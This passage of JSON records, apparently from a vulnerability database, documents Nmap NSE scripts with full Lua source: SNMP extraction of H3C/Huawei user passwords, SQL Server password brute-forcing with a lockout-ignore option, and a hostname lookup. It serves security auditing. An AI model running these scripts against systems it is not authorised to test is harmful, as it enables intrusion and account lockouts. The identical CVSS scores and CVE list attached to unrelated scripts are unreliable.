Script Arguments \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### snmp.version \n\nSee the documentation for the [snmp](<../lib/snmp.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU -p 161 --script snmp-hh3c-logins --script-args creds.snmp=:<community> <target>\n \n\n## Script Output \n \n \n | snmp-hh3c-logins:\n | users:\n | admin - admin - level: 3\n |_ h3c - h3capadmin - level 0\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [snmp](<../lib/snmp.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-11-08T07:37:48", "type": "nmap", "title": "snmp-hh3c-logins NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-07-27T03:32:27", "id": "NMAP:SNMP-HH3C-LOGINS.NSE", "href": "https://nmap.org/nsedoc/scripts/snmp-hh3c-logins.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal snmp = require \"snmp\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nAttempts to enumerate Huawei / HP/H3C Locally Defined Users through the\nhh3c-user.mib OID\n\nFor devices running software released pre-Oct 2012 only an SNMP read-only\nstring is required to access the OID. Otherwise a read-write string is\nrequired.\n\nOutput is 'username - password - level: {0|1|2|3}'\n\nPassword may be in cleartext, ciphertext or sha256\nLevels are from 0 to 3 with 0 being the lowest security level\n\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685\nhttp://grutztopia.jingojango.net/2012/10/hph3c-and-huawei-snmp-weak-access-to.html\n]]\n\n---\n-- @usage\n-- nmap -sU -p 161 --script snmp-hh3c-logins --script-args creds.snmp=:<community> <target>\n--\n-- @output\n-- | snmp-hh3c-logins:\n-- | users:\n-- | admin - admin - level: 3\n-- |_ h3c - h3capadmin - level 0\n--\n-- @xmloutput\n-- <table>\n-- <elem key=\"password\">admin<elem>\n-- <elem key=\"username\">admin</elem>\n-- <elem key=\"level\">3</elem>\n-- </table>\n-- <table>\n-- <elem key=\"password\">h3capadmin<elem>\n-- <elem key=\"username\">h3c</elem>\n-- <elem key=\"level\">0</elem>\n-- </table>\n\nauthor = \"Kurt Grutzmacher\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\ndependencies = {\"snmp-brute\"}\n\n-- Version 0.3\n-- Created 10/01/2012 - v0.1 - created via modifying other walk scripts\n-- Updated 10/25/2012 - v0.2 - bugfixes and better output per NSE standards\n-- Updated 11/08/2012 - v0.3 - added xmloutput\n\n\nportrule = shortport.port_or_service(161, \"snmp\", \"udp\", {\"open\", \"open|filtered\"})\n\n--- Gets a value for the specified oid\n--\n-- @param tbl table containing <code>oid</code> and <code>value</code>\n-- @param oid string containing the object id for which the value should be extracted\n-- @return value of relevant type or nil if oid was not found\nfunction get_value_from_table( tbl, oid )\n\n for _, v in ipairs( tbl ) do\n if v.oid == oid then\n return v.value\n end\n end\n\n return nil\nend\n\n--- Processes the table and creates the script output\n--\n-- @param tbl table containing <code>oid</code> and <code>value</code>\n-- @return <code>stdnse.output_table</code> formatted table\nfunction process_answer( tbl )\n\n -- h3c-user MIB OIDs (oldoid)\n local h3cUserName = \"1.3.6.1.4.1.2011.10.2.12.1.1.1.1\"\n local h3cUserPassword = \"1.3.6.1.4.1.2011.10.2.12.1.1.1.2\"\n local h3cUserLevel = \"1.3.6.1.4.1.2011.10.2.12.1.1.1.4\"\n local h3cUserState = \"1.3.6.1.4.1.2011.10.2.12.1.1.1.5\"\n\n -- hh3c-user MIB OIDs (newoid)\n local hh3cUserName = \"1.3.6.1.4.1.25506.2.12.1.1.1.1\"\n local hh3cUserPassword = \"1.3.6.1.4.1.25506.2.12.1.1.1.2\"\n local hh3cUserLevel = \"1.3.6.1.4.1.25506.2.12.1.1.1.4\"\n local hh3cUserState = \"1.3.6.1.4.1.25506.2.12.1.1.1.5\"\n\n local output = stdnse.output_table()\n output.users = {}\n\n for _, v in ipairs( tbl ) do\n\n if ( v.oid:match(\"^\" .. h3cUserName) ) then\n local item = {}\n local oldobjid = v.oid:gsub( \"^\" .. h3cUserName, h3cUserPassword)\n local password = get_value_from_table( tbl, oldobjid )\n\n if ( password == nil ) or ( #password == 0 ) then\n local newobjid = v.oid:gsub( \"^\" .. hh3cUserName, hh3cUserPassword)\n password = get_value_from_table( tbl, newobjid )\n end\n\n oldobjid = v.oid:gsub( \"^\" .. h3cUserName, h3cUserLevel)\n local level = get_value_from_table( tbl, oldobjid )\n\n if ( level == nil ) then\n local newobjoid = v.oid:gsub( \"^\" .. hh3cUserName, hh3cUserLevel)\n level = get_value_from_table( tbl, oldobjid )\n end\n\n output.users[#output.users + 1] = {username=v.value, password=password, level=level}\n end\n\n end\n\n return output\nend\n\naction = function(host, port)\n\n local oldsnmpoid = \"1.3.6.1.4.1.2011.10.2.12.1.1.1\"\n local newsnmpoid = \"1.3.6.1.4.1.25506.2.12.1.1.1\"\n\n local snmpHelper = snmp.Helper:new(host, port)\n snmpHelper:connect()\n\n local status, users = snmpHelper:walk( oldsnmpoid )\n\n if (not(status)) or ( users == nil ) or ( #users == 0 ) then\n\n -- no status? try new snmp oid\n status, users = snmpHelper:walk( newsnmpoid )\n\n if (not(status)) or ( users == nil ) or ( #users == 0 ) then\n return nil\n end\n\n end\n\n nmap.set_port_state(host, port, \"open\")\n return process_answer(users)\n\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:28", "description": "Performs password guessing against Microsoft SQL Server (ms-sql). Works best in conjunction with the `broadcast-ms-sql-discover` script. \n\nSQL Server credentials required: No (will not benefit from `mssql.username` & `mssql.password`). \n\nRun criteria: \n\n * Host script: Will run if the `mssql.instance-all`, `mssql.instance-name` or `mssql.instance-port` script arguments are used (see mssql.lua). \n * Port script: Will run against any services identified as SQL Servers, but only if the `mssql.instance-all`, `mssql.instance-name` and `mssql.instance-port` script arguments are NOT used. \n\nWARNING: SQL Server 2005 and later versions include support for account lockout policies (which are enforced on a per-user basis). If an account is locked out, the script will stop running for that instance, unless the `ms-sql-brute.ignore-lockout` argument is used. \n\nNOTE: Communication with instances via named pipes depends on the `smb` library. To communicate with (and possibly to discover) instances via named pipes, the host must have at least one SMB port (e.g. TCP 445) that was scanned and found to be open. Additionally, named pipe connections may require Windows authentication to connect to the Windows host (via SMB) in addition to the authentication required to connect to the SQL Server instances itself. See the documentation and arguments for the `smb` library for more information. \n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate with ports that were not included in the port list for the Nmap scan. This can be disabled using the `mssql.scanned-ports-only` script argument.\n\n### See also:\n\n * [ ms-sql-empty-password.nse ](<../scripts/ms-sql-empty-password.html>)\n\n## Script Arguments \n\n#### ms-sql-brute.ignore-lockout \n\nWARNING! Including this argument will cause the script to continue attempting to brute-forcing passwords for users even after a user has been locked out. This may result in many SQL Server logins being locked out!\n\n#### ms-sql-brute.brute-windows-accounts \n\nEnable targeting Windows accounts as part of the brute force attack. This should be used in conjunction with the mssql library's mssql.domain argument.\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt <host>\n nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt <host>\n \n\n## Script Output \n \n \n | ms-sql-brute:\n | [192.168.100.128\\TEST]\n | No credentials found\n | Warnings:\n | sa: AccountLockedOut\n | [192.168.100.128\\PROD]\n | Credentials found:\n | webshop_reader:secret => Login Success\n | testuser:secret1234 => PasswordMustChange\n |_ lordvader:secret1234 => Login Success\n \n \n\n## Requires \n\n * [mssql](<../lib/mssql.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [unpwdb](<../lib/unpwdb.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T10:11:54", "type": "nmap", "title": "ms-sql-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2022-01-03T21:08:52", "id": "NMAP:MS-SQL-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/ms-sql-brute.html", "sourceData": "local mssql = require \"mssql\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal unpwdb = require \"unpwdb\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nPerforms password guessing against Microsoft SQL Server (ms-sql). Works best in\nconjunction with the <code>broadcast-ms-sql-discover</code> script.\n\nSQL Server credentials required: No (will not benefit from <code>mssql.username</code> & <code>mssql.password</code>).\n\nRun criteria:\n* Host script: Will run if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code> or <code>mssql.instance-port</code> script arguments are used (see mssql.lua).\n* Port script: Will run against any services identified as SQL Servers, but only if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code> and <code>mssql.instance-port</code> script arguments are NOT used.\n\nWARNING: SQL Server 2005 and later versions include support for account lockout\npolicies (which are enforced on a per-user basis). If an account is locked out,\nthe script will stop running for that instance, unless the\n<code>ms-sql-brute.ignore-lockout</code> argument is used.\n\nNOTE: Communication with instances via named pipes depends on the <code>smb</code>\nlibrary. To communicate with (and possibly to discover) instances via named pipes,\nthe host must have at least one SMB port (e.g. TCP 445) that was scanned and\nfound to be open. Additionally, named pipe connections may require Windows\nauthentication to connect to the Windows host (via SMB) in addition to the\nauthentication required to connect to the SQL Server instances itself. See the\ndocumentation and arguments for the <code>smb</code> library for more information.\n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate\nwith ports that were not included in the port list for the Nmap scan. This can\nbe disabled using the <code>mssql.scanned-ports-only</code> script argument.\n]]\n\n---\n-- @see ms-sql-empty-password.nse\n--\n-- @usage\n-- nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt <host>\n-- nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt <host>\n--\n-- @output\n-- | ms-sql-brute:\n-- | [192.168.100.128\\TEST]\n-- | No credentials found\n-- | Warnings:\n-- | sa: AccountLockedOut\n-- | [192.168.100.128\\PROD]\n-- | Credentials found:\n-- | webshop_reader:secret => Login Success\n-- | testuser:secret1234 => PasswordMustChange\n-- |_ lordvader:secret1234 => Login Success\n--\n----\n-- @args ms-sql-brute.ignore-lockout WARNING! Including this argument will cause\n-- the script to continue attempting to brute-forcing passwords for users\n-- even after a user has been locked out. This may result in many SQL\n-- Server logins being locked out!\n--\n-- @args ms-sql-brute.brute-windows-accounts Enable targeting Windows accounts\n-- as part of the brute force attack. This should be used in conjunction\n-- with the mssql library's mssql.domain argument.\n--\n\n-- Created 01/17/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 02/01/2011 - v0.2 (Chris Woodbury)\n-- - Added ability to run against all instances on a host;\n-- - Added recognition of account-locked out and password-expired error codes;\n-- - Added storage of credentials on a per-instance basis\n-- - Added compatibility with changes in mssql.lua\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\ndependencies = {\"broadcast-ms-sql-discover\", \"ms-sql-empty-password\"}\n\n--- Returns formatted output for the given instance\nlocal function create_instance_output_table( instance )\n\n local instanceOutput = {}\n instanceOutput[\"name\"] = string.format( \"[%s]\", instance:GetName() )\n if ( instance.ms_sql_brute.credentials ) then\n local credsOutput = {}\n credsOutput[\"name\"] = \"Credentials found:\"\n table.insert( instanceOutput, credsOutput )\n\n for username, result in pairs( instance.ms_sql_brute.credentials ) do\n local password = result[1]\n local errorCode = result[2]\n password = password:len()>0 and password or \"<empty>\"\n if errorCode then\n local errorMessage = mssql.LoginErrorMessage[ errorCode ] or \"unknown error\"\n table.insert( credsOutput, string.format( \"%s:%s => %s\", username, password, errorMessage ) )\n else\n table.insert( credsOutput, string.format( \"%s:%s => Login Success\", username, password ) )\n end\n end\n\n if ( #credsOutput == 0 ) then\n table.insert( instanceOutput, \"No credentials found\" )\n end\n end\n\n if ( instance.ms_sql_brute.warnings ) then\n local warningsOutput = {}\n warningsOutput[\"name\"] = \"Warnings:\"\n table.insert( instanceOutput, warningsOutput )\n\n for _, warning in ipairs( instance.ms_sql_brute.warnings ) do\n table.insert( warningsOutput, warning )\n end\n end\n\n if ( instance.ms_sql_brute.errors ) then\n local errorsOutput = {}\n errorsOutput[\"name\"] = \"Errors:\"\n table.insert( instanceOutput, errorsOutput )\n\n for _, error in ipairs( instance.ms_sql_brute.errors ) do\n table.insert( errorsOutput, error )\n end\n end\n\n return stdnse.format_output(true, instanceOutput)\n\nend\n\n\nlocal function test_credentials( instance, helper, username, password )\n local database = \"tempdb\"\n local stopUser, stopInstance = false, false\n\n local status, result = helper:ConnectEx( instance )\n local loginErrorCode\n if( status ) then\n stdnse.debug2(\"Attempting login to %s as %s/%s\", instance:GetName(), username, password )\n status, result, loginErrorCode = helper:Login( username, password, database, instance.host.ip )\n end\n helper:Disconnect()\n\n local passwordIsGood, canLogin\n if status then\n passwordIsGood = true\n canLogin = true\n elseif ( loginErrorCode ) then\n if ( ( loginErrorCode ~= mssql.LoginErrorType.InvalidUsernameOrPassword ) and\n ( loginErrorCode ~= mssql.LoginErrorType.NotAssociatedWithTrustedConnection ) ) then\n stopUser = true\n end\n\n if ( loginErrorCode == mssql.LoginErrorType.PasswordExpired ) then passwordIsGood = true\n elseif ( loginErrorCode == mssql.LoginErrorType.PasswordMustChange ) then passwordIsGood = true\n elseif ( loginErrorCode == mssql.LoginErrorType.AccountLockedOut ) then\n stdnse.debug1(\"Account %s locked out on %s\", username, instance:GetName() )\n table.insert( instance.ms_sql_brute.warnings, string.format( \"%s: Account is locked out.\", username ) )\n if ( not stdnse.get_script_args( \"ms-sql-brute.ignore-lockout\" ) ) then\n stopInstance = true\n end\n end\n if ( mssql.LoginErrorMessage[ loginErrorCode ] == nil ) then\n stdnse.debug2(\"%s: Attemping login to %s as (%s/%s): Unknown login error number: %s\",\n SCRIPT_NAME, instance:GetName(), username, password, loginErrorCode )\n table.insert( instance.ms_sql_brute.warnings, string.format( \"Unknown login error number: %s\", loginErrorCode ) )\n end\n stdnse.debug3(\"%s: Attempt to login to %s as (%s/%s): %d (%s)\",\n SCRIPT_NAME, instance:GetName(), username, password, loginErrorCode, tostring( mssql.LoginErrorMessage[ loginErrorCode ] ) )\n else\n table.insert( instance.ms_sql_brute.errors, string.format(\"Network error. Skipping instance. Error: %s\", result ) )\n stopUser = true\n stopInstance = true\n end\n\n if ( passwordIsGood ) then\n stopUser = true\n\n instance.ms_sql_brute.credentials[ username ] = { password, loginErrorCode }\n -- Add credentials for other ms-sql scripts to use but don't\n -- add accounts that need to change passwords\n if ( canLogin ) then\n instance.credentials[ username ] = password\n -- Legacy storage method (does not distinguish between instances)\n nmap.registry.mssqlusers = nmap.registry.mssqlusers or {}\n nmap.registry.mssqlusers[username]=password\n end\n end\n\n return stopUser, stopInstance\nend\n\n--- Processes a single instance, attempting to detect an empty password for \"sa\"\nprocess_instance = function ( instance )\n\n -- One of this script's features is that it will report an instance's\n -- in both the port-script results and the host-script results. In order to\n -- avoid redundant login attempts on an instance, we will just make the\n -- attempt once and then re-use the results. We'll use a mutex to make sure\n -- that multiple script instances (e.g. a host-script and a port-script)\n -- working on the same SQL Server instance can only enter this block one at\n -- a time.\n local mutex = nmap.mutex( instance )\n mutex( \"lock\" )\n\n -- If this instance has already been tested (e.g. if we got to it by both the\n -- hostrule and the portrule), don't test it again.\n if ( instance.tested_brute ~= true ) then\n instance.tested_brute = true\n\n instance.credentials = instance.credentials or {}\n instance.ms_sql_brute = instance.ms_sql_brute or {}\n instance.ms_sql_brute.credentials = instance.ms_sql_brute.credentials or {}\n instance.ms_sql_brute.warnings = instance.ms_sql_brute.warnings or {}\n instance.ms_sql_brute.errors = instance.ms_sql_brute.errors or {}\n\n local result, status\n local stopUser, stopInstance\n local usernames, passwords, username, password\n local helper = mssql.Helper:new()\n\n if ( not instance:HasNetworkProtocols() ) then\n stdnse.debug1(\"%s has no network protocols enabled.\", instance:GetName() )\n table.insert( instance.ms_sql_brute.errors, \"No network protocols enabled.\" )\n stopInstance = true\n end\n\n status, usernames = unpwdb.usernames()\n if ( not(status) ) then\n stdnse.debug1(\"Failed to load usernames list.\" )\n table.insert( instance.ms_sql_brute.errors, \"Failed to load usernames list.\" )\n stopInstance = true\n end\n\n if ( status ) then\n status, passwords = unpwdb.passwords()\n if ( not(status) ) then\n stdnse.debug1(\"Failed to load passwords list.\" )\n table.insert( instance.ms_sql_brute.errors, \"Failed to load passwords list.\" )\n stopInstance = true\n end\n end\n\n if ( status ) then\n for username in usernames do\n if stopInstance then break end\n\n -- See if the password is the same as the username (which may not\n -- be in the password list)\n stopUser, stopInstance = test_credentials( instance, helper, username, username )\n\n for password in passwords do\n if stopUser then break end\n\n stopUser, stopInstance = test_credentials( instance, helper, username, password )\n end\n\n passwords(\"reset\")\n end\n end\n end\n\n -- The password testing has been finished. Unlock the mutex.\n mutex( \"done\" )\n\n return create_instance_output_table( instance )\n\nend\n\nlocal do_action\ndo_action, portrule, hostrule = mssql.Helper.InitScript(process_instance)\n\naction = function(...)\n\n local domain, bruteWindows = stdnse.get_script_args(\"mssql.domain\", \"ms-sql-brute.brute-windows-accounts\")\n\n if ( domain and not(bruteWindows) ) then\n local ret = \"\\n \" ..\n \"Windows authentication was enabled but the argument\\n \" ..\n \"ms-sql-brute.brute-windows-accounts was not given. As there is currently no\\n \" ..\n \"way of detecting accounts being locked out when Windows authentication is \\n \" ..\n \"used, make sure that the amount entries in the password list\\n \" ..\n \"(passdb argument) are at least 2 entries below the lockout threshold.\"\n return ret\n end\n\n return do_action(...)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:49", "description": "Discovers hostnames that resolve to the target's IP address by querying the online database at <http://www.bfk.de/bfk_dnslogger.html>. \n\nThe script is in the \"external\" category because it sends target IPs to a third party in order to query their database. \n\nThis script was formerly (until April 2012) known as hostmap.nse.\n\n## Script Arguments \n\n#### hostmap-bfk.prefix \n\nIf set, saves the output for each host in a file called \"<prefix><target>\". The file contains one entry per line.\n\n#### newtargets \n\nIf set, add the new hostnames to the scanning queue. This the names presumably resolve to the same IP address as the original target, this is only useful for services such as HTTP that can change their behavior based on hostname.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### max-newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- <targets>\n \n\n## Script Output \n \n \n Host script results:\n | hostmap-bfk:\n | hosts:\n | insecure.org\n | 173.255.243.189\n | images.insecure.org\n | www.insecure.org\n | nmap.org\n | 189.243.255.173.in-addr.arpa\n | mail.nmap.org\n | svn.nmap.org\n | www.nmap.org\n | sectools.org\n | seclists.org\n |_ li253-189.members.linode.com\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-09T06:35:15", "type": "nmap", "title": "hostmap-bfk NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HOSTMAP-BFK.NSE", "href": "https://nmap.org/nsedoc/scripts/hostmap-bfk.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nDiscovers hostnames that resolve to the target's IP address by querying the online database at http://www.bfk.de/bfk_dnslogger.html.\n\nThe script is in the \"external\" category because it sends target IPs to a third party in order to query their database.\n\nThis script was formerly (until April 2012) known as hostmap.nse.\n]]\n\n---\n-- @args hostmap-bfk.prefix If set, saves the output for each host in a file\n-- called \"<prefix><target>\". The file contains one entry per line.\n-- @args newtargets If set, add the new hostnames to the scanning queue.\n-- This the names presumably resolve to the same IP address as the\n-- original target, this is only useful for services such as HTTP that\n-- can change their behavior based on hostname.\n--\n-- @usage\n-- nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- <targets>\n--\n-- @output\n-- Host script results:\n-- | hostmap-bfk:\n-- | hosts:\n-- | insecure.org\n-- | 173.255.243.189\n-- | images.insecure.org\n-- | www.insecure.org\n-- | nmap.org\n-- | 189.243.255.173.in-addr.arpa\n-- | mail.nmap.org\n-- | svn.nmap.org\n-- | www.nmap.org\n-- | sectools.org\n-- | seclists.org\n-- |_ li253-189.members.linode.com\n--\n-- @xmloutput\n-- <table key=\"hosts\">\n-- <elem>insecure.org</elem>\n-- <elem>173.255.243.189</elem>\n-- <elem>images.insecure.org</elem>\n-- <elem>www.insecure.org</elem>\n-- <elem>nmap.org</elem>\n-- <elem>189.243.255.173.in-addr.arpa</elem>\n-- <elem>mail.nmap.org</elem>\n-- <elem>svn.nmap.org</elem>\n-- <elem>www.nmap.org</elem>\n-- <elem>sectools.org</elem>\n-- <elem>seclists.org</elem>\n-- <elem>li253-189.members.linode.com</elem>\n-- </table>\n---\n\nauthor = \"Ange Gutek\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"external\", \"discovery\"}\n\n\nlocal HOSTMAP_SERVER = \"www.bfk.de\"\n\nlocal write_file\n\nhostrule = function(host)\n return not ipOps.isPrivate(host.ip)\nend\n\naction = function(host)\n local query = \"/bfk_dnslogger.html?query=\" .. host.ip\n local response\n local output_tab = stdnse.output_table()\n response = http.get(HOSTMAP_SERVER, 80, query, {any_af=true})\n if not response.status then\n stdnse.debug1(\"Error: could not GET http://%s%s\", HOSTMAP_SERVER, query)\n return nil\n end\n local hostnames = {}\n local hosts_log = {}\n for entry in string.gmatch(response.body, \"#result\\\" rel=\\\"nofollow\\\">(.-)</a></tt>\") do\n if not hostnames[entry] then\n if target.ALLOW_NEW_TARGETS then\n local status, err = target.add(entry)\n end\n hostnames[entry] = true\n hosts_log[#hosts_log + 1] = entry\n end\n end\n\n if #hosts_log == 0 then\n if not string.find(response.body, \"<p>The server returned no hits.</p>\") then\n stdnse.debug1(\"Error: found no hostnames but not the marker for \\\"no hostnames found\\\" (pattern error?)\")\n end\n return nil\n end\n output_tab.hosts = hosts_log\n local hostnames_str = table.concat(hostnames, \"\\n\")\n\n local filename_prefix = stdnse.get_script_args(\"hostmap-bfk.prefix\")\n if filename_prefix then\n local filename = filename_prefix .. stringaux.filename_escape(host.targetname or host.ip)\n local status, err = write_file(filename, hostnames_str .. \"\\n\")\n if status then\n output_tab.filename = filename\n else\n stdnse.debug1(\"Error saving to %s: %s\\n\", filename, err)\n end\n end\n\n return output_tab\nend\n\nfunction write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:29", "description": "Performs brute force password auditing against the OpenVAS manager using OMPv2.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### omp2.password, omp2.username \n\nSee the documentation for the [omp2](<../lib/omp2.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 9390 --script omp2-brute <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 9390/tcp open openvas syn-ack\n | omp2-brute:\n | Accounts\n |_ admin:secret => Valid credentials\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [omp2](<../lib/omp2.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T23:44:16", "type": "nmap", "title": "omp2-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 